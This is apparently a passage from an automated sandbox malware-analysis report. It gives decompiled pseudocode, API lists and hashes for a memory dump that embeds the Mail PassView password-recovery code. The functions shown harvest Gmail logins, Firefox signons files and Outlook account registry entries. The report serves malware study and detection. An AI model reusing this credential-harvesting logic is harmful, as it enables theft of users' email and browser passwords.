				char _v4172;
				void* __ebx;
				void* __esi;
				void* _t36;
				void* _t37;
				void* _t48;
				void* _t55;
				intOrPtr* _t56;
				signed int _t58;
				intOrPtr* _t63;
				void* _t70;
				void* _t71;

				_t56 = __ecx;
				E004118A0(0x1048, __ecx);
				_t63 = _t56;
				_v8 = _t63;
				E00405EFD(_a4, "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v1100 = 0;
				memset( &_v1099, 0, 0x3ff);
				_v3148 = 0;
				memset( &_v3147, 0, 0x3ff);
				_v2124 = 0;
				memset( &_v2123, 0, 0x3ff);
				_t71 = _t70 + 0x2c;
				if( *0x417308 != 0) {
					sprintf( &_v3148, "<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>", 0x417308);
					_t71 = _t71 + 0xc;
				}
				if( *0x417304 != 0) {
					strcpy( &_v1100, "<table dir=\"rtl\"><tr><td>\r\n");
				}
				_t36 =  *((intOrPtr*)( *_t63 + 0x1c))();
				_t58 = 0x10;
				_push(_t36);
				_t37 = memcpy( &_v76, "<html><head>%s<title>%s</title></head>\r\n<body>\r\n%s <h3>%s</h3>\r\n", _t58 << 2);
				asm("movsb");
				sprintf( &_v4172,  &_v76,  &_v3148, _t37,  &_v1100);
				E00405EFD(_a4,  &_v4172);
				_push("Mail PassView");
				_t55 = 6;
				_push(E004078FF(_t55));
				sprintf( &_v2124, "<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_t48 = E00405EFD(_a4,  &_v2124);
				_t78 = _a8 - 4;
				if(_a8 == 4) {
					return E004097E6(_v8, _t78, _a4);
				}
				return _t48;
			}























                                                                                                                                                    0x00403e87
                                                                                                                                                    0x00403e8f
                                                                                                                                                    0x00403e9f
                                                                                                                                                    0x00403ea1
                                                                                                                                                    0x00403ea4
                                                                                                                                                    0x00403eb9
                                                                                                                                                    0x00403ebf
                                                                                                                                                    0x00403ecd
                                                                                                                                                    0x00403ed3
                                                                                                                                                    0x00403ee1
                                                                                                                                                    0x00403ee7
                                                                                                                                                    0x00403eec
                                                                                                                                                    0x00403ef5
                                                                                                                                                    0x00403f08
                                                                                                                                                    0x00403f0d
                                                                                                                                                    0x00403f0d
                                                                                                                                                    0x00403f16
                                                                                                                                                    0x00403f24
                                                                                                                                                    0x00403f2a
                                                                                                                                                    0x00403f2f
                                                                                                                                                    0x00403f34
                                                                                                                                                    0x00403f35
                                                                                                                                                    0x00403f3e
                                                                                                                                                    0x00403f5a
                                                                                                                                                    0x00403f5b
                                                                                                                                                    0x00403f6a
                                                                                                                                                    0x00403f72
                                                                                                                                                    0x00403f79
                                                                                                                                                    0x00403f7f
                                                                                                                                                    0x00403f8c
                                                                                                                                                    0x00403f9b
                                                                                                                                                    0x00403fa3
                                                                                                                                                    0x00403fa7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00403faf
                                                                                                                                                    0x00403fb8

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                                                                                      • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,75144DE0,00000000,?,?,004092ED,00000001,00412B1C,75144DE0), ref: 00405F17
                                                                                                                                                    • memset.MSVCRT ref: 00403EBF
                                                                                                                                                    • memset.MSVCRT ref: 00403ED3
                                                                                                                                                    • memset.MSVCRT ref: 00403EE7
                                                                                                                                                    • sprintf.MSVCRT ref: 00403F08
                                                                                                                                                    • strcpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F24
                                                                                                                                                    • sprintf.MSVCRT ref: 00403F5B
                                                                                                                                                    • sprintf.MSVCRT ref: 00403F8C
                                                                                                                                                    Strings
                                                                                                                                                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F86
                                                                                                                                                    • Mail PassView, xrefs: 00403F72
                                                                                                                                                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F02
                                                                                                                                                    • <table dir="rtl"><tr><td>, xrefs: 00403F1E
                                                                                                                                                    • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F36
                                                                                                                                                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403E97
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memsetsprintf$FileWritestrcpystrlen
                                                                                                                                                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$Mail PassView
                                                                                                                                                    • API String ID: 1043021993-495024357
                                                                                                                                                    • Opcode ID: 9ab723875cfdb90570c6b26727e8dc31f2cea9ea6bbea43a89162690f7ebea04
                                                                                                                                                    • Instruction ID: b86957a5e19b08f75c710fe46d40d6f019605627493d012667a382a844d4f915
                                                                                                                                                    • Opcode Fuzzy Hash: 9ab723875cfdb90570c6b26727e8dc31f2cea9ea6bbea43a89162690f7ebea04
                                                                                                                                                    • Instruction Fuzzy Hash: A93196B2C40118BADB11EB55DC82EDE7BACEF44304F0045A7B60DA3151DE786FC88BA8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00404288 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00404288(intOrPtr __ecx, void* __esi, void* __fp0, wchar_t** _a4) {
				intOrPtr _v8;
				char _v280;
				char _v408;
				intOrPtr _v412;
				char _v796;
				intOrPtr _v800;
				char _v928;
				char _v940;
				wchar_t* _t23;
				char* _t41;
				wchar_t** _t59;
				void* _t76;

				_t76 = __fp0;
				_t59 = _a4;
				_t23 =  *_t59;
				_v8 = __ecx;
				if(_t23 != 0 && _t59[1] != 0 && _t59[2] != 0 && wcsstr(_t23, L"www.google.com") != 0) {
					E004021D8( &_v940);
					_v800 = 7;
					_v412 = 3;
					WideCharToMultiByte(0, 0, _t59[1], 0xffffffff,  &_v408, 0x7f, 0, 0);
					WideCharToMultiByte(0, 0, _t59[2], 0xffffffff,  &_v280, 0x7f, 0, 0);
					strcpy( &_v928,  &_v408);
					strcpy( &_v796,  &_v408);
					if(strchr( &_v796, 0x40) == 0 && strlen( &_v408) + 0xa < 0x7f) {
						sprintf( &_v796, "%s@gmail.com",  &_v408);
					}
					_t41 = strchr( &_v928, 0x40);
					if(_t41 != 0) {
						 *_t41 = 0;
					}
					E00402407( &_v940, _t76, _v8 + 0xfffff788);
				}
				return 1;
			}















                                                                                                                                                    0x00404288
                                                                                                                                                    0x00404293
                                                                                                                                                    0x00404296
                                                                                                                                                    0x0040429c
                                                                                                                                                    0x0040429f
                                                                                                                                                    0x004042d3
                                                                                                                                                    0x004042ee
                                                                                                                                                    0x004042fa
                                                                                                                                                    0x00404304
                                                                                                                                                    0x00404318
                                                                                                                                                    0x00404328
                                                                                                                                                    0x0040433b
                                                                                                                                                    0x00404354
                                                                                                                                                    0x0040437e
                                                                                                                                                    0x00404383
                                                                                                                                                    0x0040438f
                                                                                                                                                    0x00404398
                                                                                                                                                    0x0040439a
                                                                                                                                                    0x0040439a
                                                                                                                                                    0x004043ab
                                                                                                                                                    0x004043ab
                                                                                                                                                    0x004043b6

                                                                                                                                                    APIs
                                                                                                                                                    • wcsstr.MSVCRT ref: 004042BD
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404304
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404318
                                                                                                                                                    • strcpy.MSVCRT(?,?), ref: 00404328
                                                                                                                                                    • strcpy.MSVCRT(?,?,?,?), ref: 0040433B
                                                                                                                                                    • strchr.MSVCRT ref: 00404349
                                                                                                                                                    • strlen.MSVCRT ref: 0040435D
                                                                                                                                                    • sprintf.MSVCRT ref: 0040437E
                                                                                                                                                    • strchr.MSVCRT ref: 0040438F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWidestrchrstrcpy$sprintfstrlenwcsstr
                                                                                                                                                    • String ID: %s@gmail.com$www.google.com
                                                                                                                                                    • API String ID: 1359934567-4070641962
                                                                                                                                                    • Opcode ID: 8108c03dee5360a7f6a3e2f925f6b83e3505abd913d650f45db378c2ca998167
                                                                                                                                                    • Instruction ID: 90bd0330eeb49ee3a27dc93359d6b9986b282e86ae315167fefd13048bcd18fc
                                                                                                                                                    • Opcode Fuzzy Hash: 8108c03dee5360a7f6a3e2f925f6b83e3505abd913d650f45db378c2ca998167
                                                                                                                                                    • Instruction Fuzzy Hash: 793188B290021D7FDB21D791DD81FDAB3ACDB44354F1005A7F709E2181D678AF858A58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040827A Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                    			E0040827A(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, char* _a8) {
				void _v4103;
				char _v4104;
				int _t21;
				int _t28;
				void* _t35;

				_t35 = __eflags;
				E004118A0(0x1004, __ecx);
				strcpy(0x4171b8, _a8);
				strcpy(0x4172c0, "general");
				E00407E55(_t35, "TranslatorName", 0x412466);
				E00407E55(_t35, "TranslatorURL", 0x412466);
				EnumResourceNamesA(_a4, 4, E004080A3, 0);
				EnumResourceNamesA(_a4, 5, E004080A3, 0);
				strcpy(0x4172c0, "strings");
				_t28 = 0;
				_v4104 = 0;
				memset( &_v4103, 0, 0x1000);
				do {
					_t21 = LoadStringA(_a4, _t28,  &_v4104, 0x1000);
					if(_t21 > 0) {
						_t21 = E00407EC3(_t28,  &_v4104);
					}
					_t28 = _t28 + 1;
				} while (_t28 <= 0xffff);
				 *0x4171b8 = 0;
				return _t21;
			}








                                                                                                                                                    0x0040827a
                                                                                                                                                    0x00408282
                                                                                                                                                    0x00408292
                                                                                                                                                    0x004082a2
                                                                                                                                                    0x004082b2
                                                                                                                                                    0x004082bd
                                                                                                                                                    0x004082d8
                                                                                                                                                    0x004082e2
                                                                                                                                                    0x004082ea
                                                                                                                                                    0x004082f5
                                                                                                                                                    0x004082ff
                                                                                                                                                    0x00408306
                                                                                                                                                    0x0040830e
                                                                                                                                                    0x0040831a
                                                                                                                                                    0x00408322
                                                                                                                                                    0x0040832c
                                                                                                                                                    0x00408332
                                                                                                                                                    0x00408333
                                                                                                                                                    0x00408334
                                                                                                                                                    0x0040833e
                                                                                                                                                    0x00408347

                                                                                                                                                    APIs
                                                                                                                                                    • strcpy.MSVCRT(004171B8,00000000,00000000,00000000,?,?,004083AB,00000000,?,00000000,00000104,?), ref: 00408292
                                                                                                                                                    • strcpy.MSVCRT(004172C0,general,004171B8,00000000,00000000,00000000,?,?,004083AB,00000000,?,00000000,00000104,?), ref: 004082A2
                                                                                                                                                      • Part of subcall function 00407E55: memset.MSVCRT ref: 00407E7A
                                                                                                                                                      • Part of subcall function 00407E55: GetPrivateProfileStringA.KERNEL32(004172C0,00000104,00412466,?,00001000,004171B8), ref: 00407E9E
                                                                                                                                                      • Part of subcall function 00407E55: WritePrivateProfileStringA.KERNEL32(004172C0,?,?,004171B8), ref: 00407EB5
                                                                                                                                                    • EnumResourceNamesA.KERNEL32 ref: 004082D8
                                                                                                                                                    • EnumResourceNamesA.KERNEL32 ref: 004082E2
                                                                                                                                                    • strcpy.MSVCRT(004172C0,strings,?,004083AB,00000000,?,00000000,00000104,?), ref: 004082EA
                                                                                                                                                    • memset.MSVCRT ref: 00408306
                                                                                                                                                    • LoadStringA.USER32 ref: 0040831A
                                                                                                                                                      • Part of subcall function 00407EC3: _itoa.MSVCRT ref: 00407EE4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Stringstrcpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                                    • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                                                    • API String ID: 1060401815-3647959541
                                                                                                                                                    • Opcode ID: acaf4a6ca7367b184f6fdf17ade1074e09c73fb74d797c334c49b365d943b025
                                                                                                                                                    • Instruction ID: d5eae57ffc3fdd8f11c9b4c351fac369e1a37aafa95eb04bb89d09d1e585c4c7
                                                                                                                                                    • Opcode Fuzzy Hash: acaf4a6ca7367b184f6fdf17ade1074e09c73fb74d797c334c49b365d943b025
                                                                                                                                                    • Instruction Fuzzy Hash: 6E1104319802543AD7212B56DC06FCB3E6DCF85B59F1040BBB708B6191C9BC9EC087AD
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040D1EC Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 128stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                    			E0040D1EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
				void _v267;
				char _v268;
				void* __edi;
				void* __esi;
				void* _t31;
				int _t40;
				void* _t44;
				void* _t49;
				char* _t50;
				void* _t57;
				int _t62;
				char* _t68;
				void* _t70;
				void* _t73;
				void* _t74;
				intOrPtr* _t86;
				char* _t89;
				void* _t90;
				char** _t91;

				_t86 = __eax;
				_t31 = E00406C2F(__eax + 0x1c, __eax, __eflags, _a4);
				_t94 = _t31;
				if(_t31 == 0) {
					__eflags = 0;
					return 0;
				}
				E0040462E(_t86 + 0x468);
				_t68 = _t86 + 0x158;
				E004061FF(_t68, _a4);
				_t89 = _t86 + 0x25d;
				 *_t89 = 0;
				E0040C530(_t94, _t86 + 0x18);
				if( *_t89 == 0) {
					_t62 = strlen(_t68);
					 *_t91 = "signons.txt";
					_t9 = strlen(??) + 1; // 0x1
					if(_t62 + _t9 >= 0x104) {
						 *_t89 = 0;
					} else {
						E004062AD(_t89, _t86 + 0x158, "signons.txt");
					}
				}
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t40 = strlen(_t86 + 0x158);
				_t91[3] = "signons.sqlite";
				_t15 = strlen(??) + 1; // 0x1
				_pop(_t73);
				if(_t40 + _t15 >= 0x104) {
					_v268 = 0;
				} else {
					E004062AD( &_v268, _t86 + 0x158, "signons.sqlite");
					_pop(_t73);
				}
				_t98 =  *_t89;
				if( *_t89 != 0) {
					_t57 = E00406C2F(_t86 + 4, _t86, _t98, _t89);
					_t99 = _t57;
					if(_t57 != 0) {
						E0040C475(_t73, _t86, _t99);
					}
				}
				_t44 = E0040614B( &_v268);
				_t100 = _t44;
				_pop(_t74);
				if(_t44 != 0) {
					E0040CE28(_t74, _t100, _t86,  &_v268);
				}
				_t70 = 0;
				if( *((intOrPtr*)(_t86 + 0x474)) <= 0) {
					L19:
					return 1;
				} else {
					do {
						_t90 = E0040D438(_t70, _t86 + 0x468);
						_t24 = _t90 + 0x504; // 0x504
						_t49 = _t24;
						_push("none");
						_push(_t49);
						L004115B2();
						if(_t49 != 0) {
							_t25 = _t90 + 4; // 0x4
							_t50 = _t25;
							if( *_t50 == 0) {
								_t26 = _t90 + 0x204; // 0x204
								strcpy(_t50, _t26);
							}
							 *((intOrPtr*)( *_t86 + 4))(_t90);
						}
						_t70 = _t70 + 1;
					} while (_t70 <  *((intOrPtr*)(_t86 + 0x474)));
					goto L19;
				}
			}






















                                                                                                                                                    0x0040d1fb
                                                                                                                                                    0x0040d200
                                                                                                                                                    0x0040d205
                                                                                                                                                    0x0040d207
                                                                                                                                                    0x0040d371
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040d371
                                                                                                                                                    0x0040d213
                                                                                                                                                    0x0040d21b
                                                                                                                                                    0x0040d223
                                                                                                                                                    0x0040d22c
                                                                                                                                                    0x0040d233
                                                                                                                                                    0x0040d236
                                                                                                                                                    0x0040d23e
                                                                                                                                                    0x0040d241
                                                                                                                                                    0x0040d248
                                                                                                                                                    0x0040d254
                                                                                                                                                    0x0040d25e
                                                                                                                                                    0x0040d277
                                                                                                                                                    0x0040d260
                                                                                                                                                    0x0040d26e
                                                                                                                                                    0x0040d274
                                                                                                                                                    0x0040d25e
                                                                                                                                                    0x0040d288
                                                                                                                                                    0x0040d28f
                                                                                                                                                    0x0040d29e
                                                                                                                                                    0x0040d2a5
                                                                                                                                                    0x0040d2b1
                                                                                                                                                    0x0040d2ba
                                                                                                                                                    0x0040d2bb
                                                                                                                                                    0x0040d2d8
                                                                                                                                                    0x0040d2bd
                                                                                                                                                    0x0040d2cf
                                                                                                                                                    0x0040d2d5
                                                                                                                                                    0x0040d2d5
                                                                                                                                                    0x0040d2df
                                                                                                                                                    0x0040d2e2
                                                                                                                                                    0x0040d2e8
                                                                                                                                                    0x0040d2ed
                                                                                                                                                    0x0040d2ef
                                                                                                                                                    0x0040d2f1
                                                                                                                                                    0x0040d2f1
                                                                                                                                                    0x0040d2ef
                                                                                                                                                    0x0040d2fd
                                                                                                                                                    0x0040d302
                                                                                                                                                    0x0040d304
                                                                                                                                                    0x0040d305
                                                                                                                                                    0x0040d30f
                                                                                                                                                    0x0040d30f
                                                                                                                                                    0x0040d314
                                                                                                                                                    0x0040d31c
                                                                                                                                                    0x0040d36c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040d31e
                                                                                                                                                    0x0040d31e
                                                                                                                                                    0x0040d32b
                                                                                                                                                    0x0040d32d
                                                                                                                                                    0x0040d32d
                                                                                                                                                    0x0040d333
                                                                                                                                                    0x0040d338
                                                                                                                                                    0x0040d339
                                                                                                                                                    0x0040d342
                                                                                                                                                    0x0040d344
                                                                                                                                                    0x0040d344
                                                                                                                                                    0x0040d34a
                                                                                                                                                    0x0040d34c
                                                                                                                                                    0x0040d354
                                                                                                                                                    0x0040d35a
                                                                                                                                                    0x0040d360
                                                                                                                                                    0x0040d360
                                                                                                                                                    0x0040d363
                                                                                                                                                    0x0040d364
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040d31e

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00406C2F: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040D205,?,?,?,?), ref: 00406C48
                                                                                                                                                      • Part of subcall function 00406C2F: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00406C74
                                                                                                                                                      • Part of subcall function 0040462E: free.MSVCRT(00000000,0040BC35), ref: 00404635
                                                                                                                                                      • Part of subcall function 004061FF: strcpy.MSVCRT(?,?,0040D228,?,?,?,?,?), ref: 00406204
                                                                                                                                                      • Part of subcall function 004061FF: strrchr.MSVCRT ref: 0040620C
                                                                                                                                                      • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C551
                                                                                                                                                      • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C565
                                                                                                                                                      • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C579
                                                                                                                                                      • Part of subcall function 0040C530: memcpy.MSVCRT ref: 0040C646
                                                                                                                                                      • Part of subcall function 0040C530: memcpy.MSVCRT ref: 0040C6A6
                                                                                                                                                    • strlen.MSVCRT ref: 0040D241
                                                                                                                                                    • strlen.MSVCRT ref: 0040D24F
                                                                                                                                                      • Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
                                                                                                                                                      • Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4
                                                                                                                                                    • memset.MSVCRT ref: 0040D28F
                                                                                                                                                    • strlen.MSVCRT ref: 0040D29E
                                                                                                                                                    • strlen.MSVCRT ref: 0040D2AC
                                                                                                                                                    • _stricmp.MSVCRT(00000504,none,?,?,?), ref: 0040D339
                                                                                                                                                    • strcpy.MSVCRT(00000004,00000204,?,?,?), ref: 0040D354
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memsetstrlen$strcpy$memcpy$CloseFileHandleSize_stricmpfreestrcatstrrchr
                                                                                                                                                    • String ID: none$signons.sqlite$signons.txt
                                                                                                                                                    • API String ID: 2681923396-1088577317
                                                                                                                                                    • Opcode ID: 320e3f5b2275387b9dd69f73878994cc1174bc0b0e146de94454896ca0fe85a1
                                                                                                                                                    • Instruction ID: 747294efef189d2a86bae337d02489a359e47e35f4212505bb9232dde5c11721
                                                                                                                                                    • Opcode Fuzzy Hash: 320e3f5b2275387b9dd69f73878994cc1174bc0b0e146de94454896ca0fe85a1
                                                                                                                                                    • Instruction Fuzzy Hash: 3041E3B1508246AAD710EBB1CC81BDAB798AF40305F10057FE596E21C2EB7CE9C9876D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00402C44 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 104registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00402C44(void* __ecx, void* __fp0, intOrPtr _a4) {
				void* _v8;
				int _v12;
				char _v16;
				char _v20;
				void _v275;
				char _v276;
				void _v1299;
				char _v1300;
				void* __esi;
				void* _t35;
				intOrPtr _t36;
				void* _t40;
				void* _t52;
				void* _t58;
				void* _t60;
				void* _t64;
				char* _t66;
				void* _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t83;

				_t83 = __fp0;
				_t64 = __ecx;
				_t35 = E0040EB3F(0x80000001, "Identities",  &_v8);
				_t74 = _t73 + 0xc;
				if(_t35 == 0) {
					_v12 = 0;
					_v276 = 0;
					memset( &_v275, 0, 0xff);
					_t40 = E0040EC05(_v8, 0,  &_v276);
					_t75 = _t74 + 0x18;
					if(_t40 == 0) {
						_t66 = "%s\\%s";
						do {
							_t69 = _a4;
							E0040EBC1(_t64, _v8,  &_v276, "Username", _a4 + 0xa9c, 0x7f);
							_v1300 = 0;
							memset( &_v1299, 0, 0x3ff);
							sprintf( &_v1300, _t66,  &_v276, "Software\\Microsoft\\Internet Account Manager\\Accounts");
							_t52 = E0040EB3F(_v8,  &_v1300,  &_v16);
							_t76 = _t75 + 0x3c;
							_t80 = _t52;
							if(_t52 == 0) {
								E00402BB8(_t64,  &_v16, _t80, _t83, _t69, 1);
							}
							sprintf( &_v1300, _t66,  &_v276, "Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts");
							_t58 = E0040EB3F(_v8,  &_v1300,  &_v20);
							_t77 = _t76 + 0x1c;
							_t81 = _t58;
							if(_t58 == 0) {
								E00402BB8(_t64,  &_v20, _t81, _t83, _a4, 5);
							}
							_v12 = _v12 + 1;
							_t60 = E0040EC05(_v8, _v12,  &_v276);
							_t75 = _t77 + 0xc;
						} while (_t60 == 0);
					}
					RegCloseKey(_v8);
				}
				_t36 = _a4;
				 *((char*)(_t36 + 0xa9c)) = 0;
				return _t36;
			}


























                                                                                                                                                    0x00402c44
                                                                                                                                                    0x00402c44
                                                                                                                                                    0x00402c5c
                                                                                                                                                    0x00402c61
                                                                                                                                                    0x00402c68
                                                                                                                                                    0x00402c7b
                                                                                                                                                    0x00402c7e
                                                                                                                                                    0x00402c84
                                                                                                                                                    0x00402c94
                                                                                                                                                    0x00402c99
                                                                                                                                                    0x00402c9e
                                                                                                                                                    0x00402ca6
                                                                                                                                                    0x00402cab
                                                                                                                                                    0x00402cab
                                                                                                                                                    0x00402cc6
                                                                                                                                                    0x00402cd8
                                                                                                                                                    0x00402cde
                                                                                                                                                    0x00402cf7
                                                                                                                                                    0x00402d0a
                                                                                                                                                    0x00402d0f
                                                                                                                                                    0x00402d12
                                                                                                                                                    0x00402d14
                                                                                                                                                    0x00402d1c
                                                                                                                                                    0x00402d1c
                                                                                                                                                    0x00402d35
                                                                                                                                                    0x00402d48
                                                                                                                                                    0x00402d4d
                                                                                                                                                    0x00402d50
                                                                                                                                                    0x00402d52
                                                                                                                                                    0x00402d5c
                                                                                                                                                    0x00402d5c
                                                                                                                                                    0x00402d61
                                                                                                                                                    0x00402d71
                                                                                                                                                    0x00402d76
                                                                                                                                                    0x00402d79
                                                                                                                                                    0x00402d82
                                                                                                                                                    0x00402d86
                                                                                                                                                    0x00402d86
                                                                                                                                                    0x00402d8c
                                                                                                                                                    0x00402d8f
                                                                                                                                                    0x00402d97

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                                                                                    • memset.MSVCRT ref: 00402C84
                                                                                                                                                      • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402D86
                                                                                                                                                      • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                                                                                                    • memset.MSVCRT ref: 00402CDE
                                                                                                                                                    • sprintf.MSVCRT ref: 00402CF7
                                                                                                                                                    • sprintf.MSVCRT ref: 00402D35
                                                                                                                                                      • Part of subcall function 00402BB8: memset.MSVCRT ref: 00402BD8
                                                                                                                                                      • Part of subcall function 00402BB8: RegCloseKey.ADVAPI32 ref: 00402C3C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Closememset$sprintf$EnumOpen
                                                                                                                                                    • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                                                                                    • API String ID: 1831126014-3814494228
                                                                                                                                                    • Opcode ID: e558669e5098f51d47a130cd26e8095db06e1949dd15f7d6cacb61a667ea587b
                                                                                                                                                    • Instruction ID: 6c0256c292ffb55b53f7a2730c4bcad7d13cefd93b753116a94389aae211c0df
                                                                                                                                                    • Opcode Fuzzy Hash: e558669e5098f51d47a130cd26e8095db06e1949dd15f7d6cacb61a667ea587b
                                                                                                                                                    • Instruction Fuzzy Hash: 25315C72D0011DBADB11EA96CD46EEFB77CAF04344F0405BABA19F2091E6B49F988F54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040B53C Relevance: 16.6, APIs: 11, Instructions: 133windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                    			E0040B53C(void* __ecx, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				void* _v8;
				intOrPtr _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __esi;
				signed int _t45;
				intOrPtr _t50;
				signed int _t53;
				intOrPtr _t82;
				signed char _t86;
				intOrPtr _t88;
				intOrPtr _t90;
				void* _t91;
				void* _t92;

				_t84 = __ecx;
				_t88 = _a4;
				_t92 = _t88 - 0x402;
				_t91 = __ecx;
